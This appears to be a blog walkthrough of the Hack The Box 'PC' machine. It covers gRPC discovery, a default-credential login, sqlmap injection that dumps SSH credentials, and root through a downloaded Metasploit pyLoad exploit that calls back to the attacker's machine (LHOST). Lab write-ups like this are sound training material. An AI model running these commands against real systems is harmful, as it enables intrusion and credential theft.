PC HTB

Hey folks, 

This blog is about cracking the machine named "PC" in Hackthebox. Let's get started with the recon 

Initial Reconnaissance 

Running Nmap scan on the box, we get only one open port, 22(ssh)

So, it's showing only ssh it seems like this port is not used for exploitation let's examine deeply with the popularly known tool "Rustscan"

At the above scan, you can see one weird port as 50051/tcp that service is denoted as unknown so let's do some research about this port on Google, I came to know that it is a service named gRPC 

 Port 50051 - gRPC 

gRPC is a Remote Procedural Call framework to build scalable and fast APIs.It allows the client and server application to communicate transparently and develop connected systems. Mostly this will be run locally on the system (i.e 127.0.0.1)

By drilling Google for more information about gRPC I noticed a tool (grpcui) that was used to interact with gRPC servers via a browser

INSTALLATION OF grpcui WITH GO 

go install github.com/fullstorydev/grpcui/cmd/grpcui@latest

USAGE 

This tool works smoothly and brings a GUI interface for the gRPC port on 127.0.0.1:39385 

Login with a default credential ( admin: admin )

Change the method name to LoginUser

Fill Input on LoginUser

The checkbox will be unticked make it ticked to enable the input box 

Here I was given: a username as admin and a password as admin

finally, click Invoke to see the response data as shown below 

 

you will get an id and token of the admin as a response

capture the request in the burp suite 

Send the requests to the repeater and change the token by removing the prefix of b as given below

 

Now right-click and give a copy to file option

save with any filename 

SQLMAP 

There you can see dbs is highlighted in red colour as SQLite by placing below command on terminal

sqlmap -r htb --batch 

You can find the table name with dbs by the following commands that were given below 

sqlmap -r htb -dbs sqlite --tables --batch

By using table name accounts you can retrieve the account data as given below 

sqlmap -r htb -dbs sqlite -T accounts --dump --batch 

Yeah as you guys guessed this is the ssh credential without any delay go login with the following data you have retrieved 

SSH CREDENTIALS 

username: sau

password: HereIsYourPassWord1431

SSH LOGIN 

We got our user flag 

PRIVILEGE ESCALATION 

Run linpeas on that machine 

I noticed localhost is listening on port 8000

Now go to your system and do port forwarding 

the ss command is like netstat it shows all the network information clearly there you can see the port forwarded is successfully running 

SERVICE THAT RUNNING 

PYLOAD SERVICE IS RUNNING

EXPLOIT FOR PYLOAD 

By doing some Google search I have found Metasploit has the exploit for pyload to get admin privilege

but though it is released recently it don't reflect on your machine so I given the command to download that file using wget 

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/linux/http/pyload_js2py_exec.rb 

After downloading don't forget to place it in the default metasploit folder as I have shown in the image below 

copy to the default folder

do ls to see whether it is copied 

METASPLOIT 

Now let's run Metasploit by using commands that given below 

# msfconsole

> use exploit/linux/http/payload/pyload_js2py_exec 

> set RHOSTS 127.0.0.1

>set LHOST <your machine IP (tun0) >

>set RPORT <port that mentioned in the pyload server URL> -- following with 127.0.0.1

>exploit

If you got a meterpreter console 

type: shell 

and Boom! you are inside the machine with admin privilege   

ROOT FLAG 🎊

root flag